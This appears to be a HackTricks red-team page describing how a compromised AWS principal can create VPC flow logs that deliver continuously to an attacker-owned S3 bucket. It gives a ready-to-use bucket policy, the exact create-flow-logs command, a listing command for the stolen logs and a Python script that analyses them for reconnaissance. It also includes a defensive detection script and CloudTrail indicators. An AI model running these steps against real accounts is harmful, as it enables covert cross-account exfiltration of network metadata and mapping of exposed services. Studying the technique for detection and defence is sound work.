AWS - VPC Flow Logs Cross-Account Exfiltration to S3


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Summary

Abuse ec2:CreateFlowLogs to ship VPC, subnet, or ENI flow logs straight to an S3 bucket the attacker controls. For an S3 destination the delivery service (delivery.logs.amazonaws.com) is authorised by the bucket policy, not by a role in the victim account, so once the attacker's bucket policy trusts that service, every connection seen on the monitored resource is written outside the victim account.

Requirements

  • Victim principal: ec2:CreateFlowLogs and ec2:DescribeFlowLogs (to confirm the flow log is ACTIVE). AWS also requires logs:CreateLogDelivery (and logs:DeleteLogDelivery to remove the flow log afterwards) on the calling principal for S3 destinations. iam:PassRole is only needed if a delivery role is passed, which an S3 destination does not require.
  • Attacker bucket: an S3 bucket policy that trusts delivery.logs.amazonaws.com for s3:PutObject with the bucket-owner-full-control ACL, plus s3:GetBucketAcl on the bucket.
  • Optional: logs:DescribeLogGroups if exporting to CloudWatch Logs instead of S3 (not needed here).

Attack Steps

  1. The attacker prepares an S3 bucket policy (in the attacker account) that lets the VPC Flow Logs delivery service write objects. The second statement is the GetBucketAcl check that AWS documents for S3 delivery; the aws:SourceAccount / aws:SourceArn conditions AWS normally recommends are left out on purpose, since the delivery originates from the victim account. Replace the placeholders before running:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowVPCFlowLogsDelivery",
      "Effect": "Allow",
      "Principal": { "Service": "delivery.logs.amazonaws.com" },
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
      "Condition": {
        "StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
      }
    },
    {
      "Sid": "AllowVPCFlowLogsAclCheck",
      "Effect": "Allow",
      "Principal": { "Service": "delivery.logs.amazonaws.com" },
      "Action": "s3:GetBucketAcl",
      "Resource": "arn:aws:s3:::<attacker-bucket>"
    }
  ]
}
```

Run from the attacker account:

```bash
aws s3api put-bucket-policy \
  --bucket <attacker-bucket> \
  --policy file://flowlogs-policy.json
```
  2. The victim (compromised principal) creates flow logs that target the attacker bucket:

```bash
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>

# No delivery role is needed for an S3 destination: the attacker's bucket policy
# authorises delivery.logs.amazonaws.com directly. --deliver-logs-permission-arn is
# only required for cloud-watch-logs (and cross-account kinesis-data-firehose).
# --max-aggregation-interval 60 is optional; the default is 600 seconds, so the
# 1-minute interval just makes the first files land sooner.
aws ec2 create-flow-logs \
  --resource-type VPC \
  --resource-ids "$VPC_ID" \
  --traffic-type ALL \
  --log-destination-type s3 \
  --log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
  --max-aggregation-interval 60 \
  --region "$REGION"
```

ec2:DescribeFlowLogs then shows the new flow log with FlowLogStatus ACTIVE; a DeliverLogsErrorMessage in that output means the bucket policy is wrong. Within a few minutes, flow log files appear in the attacker bucket listing the connections of every ENI in the monitored VPC/subnet.
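On the defending side, the victim's own describe-flow-logs output is the quickest place to spot this. The following Python script is an added example (not code from the original page): it takes `aws ec2 describe-flow-logs --output json` on stdin, flags every S3 destination whose bucket is not on an allowlist (S3 ARNs carry no account ID, so an allowlist is the only cheap test) and every CloudWatch Logs or Firehose destination whose ARN names a different account. The allowlist, the account IDs, the flow-log entries and the script name are all constructed for the example.

```python
import json
import re
import sys

OWN_ACCOUNT = "111122223333"                       # assumed victim account
APPROVED_LOG_BUCKETS = {"corp-central-logging"}    # assumed org logging buckets

# Constructed sample of `aws ec2 describe-flow-logs --output json`. Field names
# match the real API response; IDs, buckets and accounts are made up.
SAMPLE_DESCRIBE_FLOW_LOGS = json.dumps({
    "FlowLogs": [
        {   # legitimate: central logging bucket
            "FlowLogId": "fl-0123456789abcdef0", "ResourceId": "vpc-0a1b2c3d4e5f67890",
            "TrafficType": "ALL", "LogDestinationType": "s3",
            "LogDestination": "arn:aws:s3:::corp-central-logging/vpcflowlogs/",
            "FlowLogStatus": "ACTIVE",
        },
        {   # attacker-created: unknown bucket, as in the attack above
            "FlowLogId": "fl-0fedcba9876543210", "ResourceId": "vpc-0a1b2c3d4e5f67890",
            "TrafficType": "ALL", "LogDestinationType": "s3",
            "LogDestination": "arn:aws:s3:::totally-legit-bucket/flowlogs/",
            "FlowLogStatus": "ACTIVE",
        },
        {   # legitimate: CloudWatch Logs group in our own account
            "FlowLogId": "fl-00000000000000001", "ResourceId": "subnet-0123456789abcdef0",
            "TrafficType": "REJECT", "LogDestinationType": "cloud-watch-logs",
            "LogDestination": "arn:aws:logs:us-east-1:111122223333:log-group:/vpc/flowlogs",
            "DeliverLogsPermissionArn": "arn:aws:iam::111122223333:role/flowlogs-role",
            "FlowLogStatus": "ACTIVE",
        },
        {   # cross-account CloudWatch Logs variant of the same exfiltration
            "FlowLogId": "fl-00000000000000002", "ResourceId": "eni-0abc0abc0abc0abc0",
            "TrafficType": "ALL", "LogDestinationType": "cloud-watch-logs",
            "LogDestination": "arn:aws:logs:us-east-1:999999999999:log-group:exfil",
            "DeliverLogsPermissionArn": "arn:aws:iam::111122223333:role/flowlogs-role",
            "FlowLogStatus": "ACTIVE",
        },
    ]
})

S3_ARN = re.compile(r"^arn:aws:s3:::(?P<bucket>[^/]+)(?:/.*)?$")


def bucket_from_arn(arn):
    """Bucket name from an S3 ARN such as arn:aws:s3:::bucket/prefix/ (None if not S3)."""
    m = S3_ARN.match(arn or "")
    return m.group("bucket") if m else None


def account_from_arn(arn):
    """Account field of a generic ARN (arn:partition:service:region:account:...)."""
    parts = (arn or "").split(":")
    return parts[4] if len(parts) > 5 else None


def find_rogue_flow_logs(describe_output, approved_buckets, own_account):
    """Return flow logs delivering outside approved_buckets or outside own_account."""
    data = json.loads(describe_output) if isinstance(describe_output, str) else describe_output
    rogue = []
    for fl in data.get("FlowLogs", []):
        dest_type = fl.get("LogDestinationType")
        dest = fl.get("LogDestination", "")
        reason = None
        if dest_type == "s3":
            # S3 ARNs carry no account ID, so the only cheap check is an allowlist.
            bucket = bucket_from_arn(dest)
            if bucket not in approved_buckets:
                reason = f"S3 bucket {bucket!r} is not an approved log bucket"
        elif dest_type in ("cloud-watch-logs", "kinesis-data-firehose"):
            # These ARNs include the owning account; anything foreign is suspect.
            acct = account_from_arn(dest)
            if acct != own_account:
                reason = f"{dest_type} destination is owned by {acct}, not {own_account}"
        if reason:
            rogue.append({"FlowLogId": fl.get("FlowLogId"), "ResourceId": fl.get("ResourceId"),
                          "LogDestination": dest, "Reason": reason})
    return rogue


def main():
    # aws ec2 describe-flow-logs --output json | python3 check_flow_logs.py  (hypothetical name)
    raw = SAMPLE_DESCRIBE_FLOW_LOGS if sys.stdin.isatty() else sys.stdin.read()
    for hit in find_rogue_flow_logs(raw, APPROVED_LOG_BUCKETS, OWN_ACCOUNT):
        print(f"[!] {hit['FlowLogId']} on {hit['ResourceId']} -> {hit['LogDestination']}: {hit['Reason']}")


if __name__ == "__main__":
    main()
```

Run it per region; a flow log on a resource you never enabled logging for, pointing at a bucket nobody recognises, is the indicator, and the matching CreateFlowLogs call in CloudTrail gives the principal that created it.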

Evidence

Sample flow log records written to the attacker bucket (default version 2 format):

```text
version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK
```

Bucket listing evidence. Objects land as gzip files under flowlogs/AWSLogs/<victim-account-id>/vpcflowlogs/<region>/YYYY/MM/DD/, so the victim account ID is visible in the key path:

```bash
aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize
```
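What the attacker does with the downloaded files is the point of the exercise, so here is an added example (not from the original page) of the traffic analysis the Impact section describes: a parser for the default version 2 record format that drops the header and NODATA/SKIPDATA intervals, then groups flows into outbound (internal host to external service), exposed (external client reaching an internal service, ACCEPT) and blocked (same, REJECT). Flow logs are unidirectional and carry no direction flag, so the "lower port is the service" rule used to pick client and server is a heuristic, and "internal" simply means RFC 1918. The sample is the evidence records above plus two constructed lines (a rejected inbound SSH probe and a NODATA interval); the script name is hypothetical.

```python
import gzip
import ipaddress
import sys
from collections import defaultdict

# Constructed sample: the evidence records above, plus two made-up lines showing
# a REJECTed inbound SSH probe and a NODATA interval that carries no addresses.
SAMPLE_LOG = """\
version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 203.0.113.9 10.77.1.240 51234 22 6 12 900 1759874460 1759874487 REJECT OK
2 947247140022 eni-074cdc68182fb7e4d - - - - - - - 1759874460 1759874487 - NODATA
"""

# Default (version 2) flow log fields, in delivery order.
FIELDS = ["version", "account_id", "interface_id", "srcaddr", "dstaddr", "srcport", "dstport",
          "protocol", "packets", "bytes", "start", "end", "action", "log_status"]
INT_FIELDS = ("srcport", "dstport", "protocol", "packets", "bytes", "start", "end")

# "Internal" means RFC 1918 here (assumption); use the victim VPC CIDRs if known.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse_flow_log(text):
    """Parse default-format records; drop the header and NODATA/SKIPDATA intervals."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] == "version" or len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        if rec["log_status"] != "OK":   # NODATA / SKIPDATA: address fields are '-'
            continue
        for k in INT_FIELDS:
            rec[k] = int(rec[k])
        records.append(rec)
    return records


def client_server(rec):
    """Heuristic (assumption): the side with the lower port is the service.
    Returns (client_ip, server_ip, service_port)."""
    if rec["dstport"] <= rec["srcport"]:
        return rec["srcaddr"], rec["dstaddr"], rec["dstport"]
    return rec["dstaddr"], rec["srcaddr"], rec["srcport"]


def summarize(records):
    """Group flows by (client, server, port) into outbound, exposed and blocked tables."""
    outbound = defaultdict(lambda: {"bytes": 0, "flows": 0})  # internal -> external service
    exposed = defaultdict(lambda: {"bytes": 0, "flows": 0})   # external -> internal, ACCEPT
    blocked = defaultdict(int)                                 # external -> internal, REJECT
    for r in records:
        key = client_server(r)
        client, server = key[0], key[1]
        if is_internal(client) and not is_internal(server):
            outbound[key]["bytes"] += r["bytes"]
            outbound[key]["flows"] += 1
        elif not is_internal(client) and is_internal(server):
            if r["action"] == "ACCEPT":
                exposed[key]["bytes"] += r["bytes"]
                exposed[key]["flows"] += 1
            else:
                blocked[key] += 1
    return {"outbound": dict(outbound), "exposed": dict(exposed), "blocked": dict(blocked)}


def main(paths):
    # python3 flowlog_recon.py flowlogs/AWSLogs/<acct>/vpcflowlogs/<region>/*/*/*/*.log.gz
    chunks = []
    for p in paths:
        with (gzip.open if p.endswith(".gz") else open)(p, "rt") as fh:
            chunks.append(fh.read())
    summary = summarize(parse_flow_log("\n".join(chunks) if chunks else SAMPLE_LOG))
    for name, table in summary.items():
        print(f"== {name} ==")
        for (client, server, port), val in sorted(table.items()):
            print(f"  {client} -> {server}:{port}  {val}")


if __name__ == "__main__":
    main(sys.argv[1:])
```

On the sample this yields three outbound HTTPS peers for 10.77.1.240 (the S3 endpoint ranges seen in the evidence), no exposed internal services, and one rejected inbound probe on port 22, which is exactly the security-group picture the attacker is after: ACCEPT entries in the exposed table would be directly reachable services, REJECT entries show what the security groups still block.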

Impact

  • Continuous exfiltration of network metadata (source/destination IPs, ports, protocols, byte counts, ACCEPT/REJECT) for the monitored VPC/subnet/ENI, with no further access to the victim account once the flow log exists.
  • Enables traffic analysis, identification of sensitive services and their peers, and discovery of security group misconfigurations (what external sources are ACCEPTed versus REJECTed) from outside the victim account.
  • Detection indicator: a CreateFlowLogs call in CloudTrail, or a DescribeFlowLogs entry, whose S3 destination is a bucket outside the account's known logging buckets.
